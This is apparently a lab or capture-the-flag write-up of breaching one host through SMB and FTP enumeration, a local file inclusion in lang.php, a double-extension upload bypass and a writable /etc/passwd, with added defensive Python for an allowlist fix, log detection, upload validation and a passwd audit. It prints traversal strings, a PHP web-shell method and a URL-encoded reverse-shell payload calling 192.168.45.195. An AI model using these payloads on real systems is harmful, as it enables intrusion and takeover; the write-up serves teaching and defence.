Target IP: 192.168.186.91
Port 25: SMTP
Port 80: HTTP
Ports 139 and 445: SMB
Port 2121: FTP
Port 3306: MySQL
Ports 8080 and 63525: HTTP
There are many ports open on the target machine. I will start enumeration with SMB as it allows guest access. FTP also allows anonymous login.
Ports 139 and 445: SMB
There is a share called WRKSHARE. I only have read access to it. I found a user called miguel. I also obtained the local.txt flag file using this access.
Port 2121: FTP
There is an interesting file called 22253251-65325.twilight when I use anonymous login to access FTP. This file contains the message shown above.
Port 80: HTTP
/Gallery
Performing a directory search using the command gobuster dir -u http://192.168.186.91 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt produced the result above.
There is an interesting directory called /gallery/. It looks like I can only upload JPEG files. After uploading a test JPEG file, I wondered where our images get stored on the target machine.
Using the WRKSHARE SMB share, I located where the images get stored on the server. When an image gets uploaded, it gets saved to three directories: original, thumbnail, and normal. So it is possible to access the uploaded images at http://192.168.186.91/gallery/<directory_name>/<image_name>. For example, I accessed my test image above by browsing to http://192.168.186.91/gallery/original/image.jpeg.
/lang.php
The webpage above is displayed for this HTTP application. It looks like I can change the language of the page by pressing the button.
An interesting parameter called lang got appended to the end of the URL. Since it is trying to include a page, could this host be vulnerable to LFI?
And bingo. The target host is vulnerable to LFI, as I was able to access the /etc/passwd file. Trying to access the SSH key of miguel did not work.
It is also possible to obtain the images from the different directories located in the /gallery/ application; for example, by browsing to http://192.168.186.91/lang.php?lang=../../../../../../var/www/html/gallery/original/image.jpeg. I should be able to place a simple web shell inside a JPEG image using this technique, and escalate it to a reverse shell connection.
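The root cause above is that lang.php builds an include path straight from the lang parameter. The following is an added example, not code from the target application or the write-up: a Python model of that unsafe pattern beside an allowlist-based replacement, plus a small detector that flags traversal attempts in the lang parameter of access-log lines. The web root, the translation directory, the language allowlist and the log lines are all constructed for the demo.

```python
"""
Added example (not from the original write-up): a defender's view of the
lang.php include.  resolve_lang_unsafe() mirrors the pattern the write-up
exploits (the parameter value is spliced into an include path), while
resolve_lang_safe() only maps allowlisted keys to fixed files, so no
traversal can reach /etc/passwd or an uploaded gallery image.
"""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlparse

LANG_DIR = "/var/www/html/lang"                       # assumed translation dir
ALLOWED_LANGS = {"en": "en.php", "es": "es.php", "fr": "fr.php"}  # assumed


def resolve_lang_unsafe(lang: str) -> str:
    """Vulnerable pattern: untrusted value becomes part of the include path."""
    return posixpath.normpath(posixpath.join(LANG_DIR, lang))


def resolve_lang_safe(lang: str):
    """Hardened: only an allowlist key selects a file; anything else is None."""
    filename = ALLOWED_LANGS.get(lang)
    if filename is None:
        return None
    return posixpath.join(LANG_DIR, filename)


# Plain and URL-encoded forms of a parent-directory step.
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|%2e%2e%2f|%2e%2e/|\.\.%2f)", re.IGNORECASE)


def find_traversal(log_lines):
    """Return (client_ip, decoded lang value) for every request whose lang
    parameter contains a traversal sequence, after one or two decodings."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 7:            # not a combined-log-format line
            continue
        ip, request_path = parts[0], parts[6]
        query = urlparse(request_path).query
        # parse_qs decodes once; unquote again to catch double encoding.
        for value in parse_qs(query, keep_blank_values=True).get("lang", []):
            if TRAVERSAL.search(value) or TRAVERSAL.search(unquote(value)):
                hits.append((ip, unquote(value)))
    return hits


# Constructed access-log lines for the demo (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /lang.php?lang=en HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /lang.php?lang=../../../../../../etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /lang.php?lang=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /gallery/original/image.jpeg HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    print("unsafe:", resolve_lang_unsafe("../../../../../../etc/passwd"))
    print("safe:  ", resolve_lang_safe("../../../../../../etc/passwd"))
    for ip, value in find_traversal(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {value}")
```

The allowlist is the control that matters: normalising the path and checking it stays under LANG_DIR would also work, but a fixed key-to-file map leaves nothing for an attacker to manipulate. The log detector is a triage aid, not a replacement for the fix; a 200 response on a flagged line is the signal that the include actually succeeded.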
I created a copy of the same test image above. I intercepted the POST request of the file upload using Burp Suite and made changes to the highlighted items above. It looks like the server only checks whether the filename contains .jpeg, meaning it is possible to bypass this by appending the .php extension, so the name becomes evil.jpeg.php. I removed the image content and replaced it with a simple PHP one-line command for the web shell.
And this uploaded successfully.
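The upload check inferred above (accept any name containing .jpeg) is a substring test, which is why a double extension passes. As an added example that is not the gallery application's code, here is that weak check beside a stricter validator: one allowlisted final extension, a restricted character set, a JPEG header check, and a server-chosen stored name. The filenames and byte strings in the test are constructed.

```python
"""
Added example (not the target application's code): the filename check the
write-up describes beside a stricter validator.  weak_check() reproduces the
inferred behaviour; strict_check() and stored_name() show the hardened form.
"""
import re
import secrets

JPEG_MAGIC = b"\xff\xd8\xff"                      # JPEG start-of-image marker
# One base name, one allowlisted extension, no path separators or extra dots.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpe?g)$", re.IGNORECASE)


def weak_check(filename: str) -> bool:
    """Inferred vulnerable behaviour: any name containing '.jpeg' is accepted."""
    return ".jpeg" in filename.lower()


def strict_check(filename: str, content: bytes) -> bool:
    """Reject double extensions, traversal characters and non-JPEG content."""
    return bool(SAFE_NAME.match(filename)) and content.startswith(JPEG_MAGIC)


def stored_name(filename: str, content: bytes):
    """Return a server-chosen name (random, fixed extension) or None if rejected.
    Discarding the client's name removes it from the attacker's control."""
    if not strict_check(filename, content):
        return None
    return f"{secrets.token_hex(16)}.jpeg"


if __name__ == "__main__":
    for name, body in [("image.jpeg", JPEG_MAGIC + b"\x00" * 8),
                       ("evil.jpeg.php", b"<?php echo 1; ?>")]:
        print(name, "weak:", weak_check(name), "strict:", strict_check(name, body))
```

Two caveats a practitioner should keep in mind. First, the header check only proves the first three bytes; it is a secondary control, and the real fix for this chain is the lang.php include, because any file that lang.php includes is executed as PHP regardless of its name or header. Second, even with validation, the upload directories should be served with PHP execution disabled so that a stored file can never run as code.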
I can now access my web shell by browsing to http://192.168.186.91/lang.php?lang=../../../../../../var/www/html/gallery/original/evil.jpeg.php. In the image above, I sent the payload whoami;ls and obtained the results. Time to upgrade this simple shell to a reverse shell connection. Since the host is running PHP, I will use a PHP payload.
Now I have a foothold on the machine via the file upload vulnerability chained with the LFI. I used the payload mentioned below.
Payload used: php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.45.195%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
URL with payload: 192.168.186.91/lang.php?lang=../../../../../../var/www/html/gallery/original/evil.jpeg.php&cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.45.195%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
WTF. It looks like I can make changes to the /etc/passwd file and create a new user with root privileges.
I created a new user called super with the password rooted. Now I have root access with this new user.
The proof.txt and local.txt flags. The local.txt flag can be obtained using the SMB WRKSHARE share without exploiting the machine. I obtained the proof.txt flag due to the weak file permissions set on the /etc/passwd file.
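The privilege escalation above depends on two conditions that are easy to audit: /etc/passwd being writable by the web server's user, and a second UID 0 account being appended. The following is an added example, not part of the write-up: a Python audit that checks the file mode and ownership and parses the passwd entries for extra UID 0 accounts and password hashes stored in passwd rather than shadow. The passwd text is constructed and the hash field is a placeholder.

```python
"""
Added example (not from the original write-up): audit /etc/passwd for the
conditions the escalation relies on.  SAMPLE_PASSWD is constructed; the
hash on the 'super' line is a placeholder, not a real hash.
"""
import os
import stat

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
miguel:x:1000:1000:miguel:/home/miguel:/bin/bash
super:$6$PLACEHOLDER_HASH:0:0::/root:/bin/bash
"""

# Values in the password field that mean "no hash here" (shadowed or locked).
NO_HASH = ("x", "*", "!", "!!")


def audit_passwd_text(text: str):
    """Return (line number, finding, detail) tuples for suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed", line))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append((lineno, "extra-uid0", user))
        if pw == "":
            findings.append((lineno, "empty-password", user))
        elif pw not in NO_HASH:
            # A hash in passwd bypasses /etc/shadow entirely.
            findings.append((lineno, "hash-in-passwd", user))
    return findings


def is_world_writable(mode: int) -> bool:
    """True if the 'other' write bit is set on a st_mode value."""
    return bool(mode & stat.S_IWOTH)


def audit_passwd_file(path="/etc/passwd"):
    """Combine the metadata checks with the content checks for a real file."""
    st = os.stat(path)
    findings = []
    if is_world_writable(st.st_mode):
        findings.append((0, "world-writable", oct(stat.S_IMODE(st.st_mode))))
    if st.st_uid != 0:
        findings.append((0, "not-owned-by-root", str(st.st_uid)))
    with open(path, encoding="utf-8") as fh:
        findings.extend(audit_passwd_text(fh.read()))
    return findings


if __name__ == "__main__":
    for finding in audit_passwd_text(SAMPLE_PASSWD):
        print(finding)
```

On a correctly configured host /etc/passwd is mode 0644 and owned by root, and the only UID 0 entry is root; the function run against the live file should therefore return an empty list. Any "extra-uid0" or "hash-in-passwd" finding is worth treating as an incident indicator rather than a misconfiguration, since both are exactly what a manual edit like the one above leaves behind.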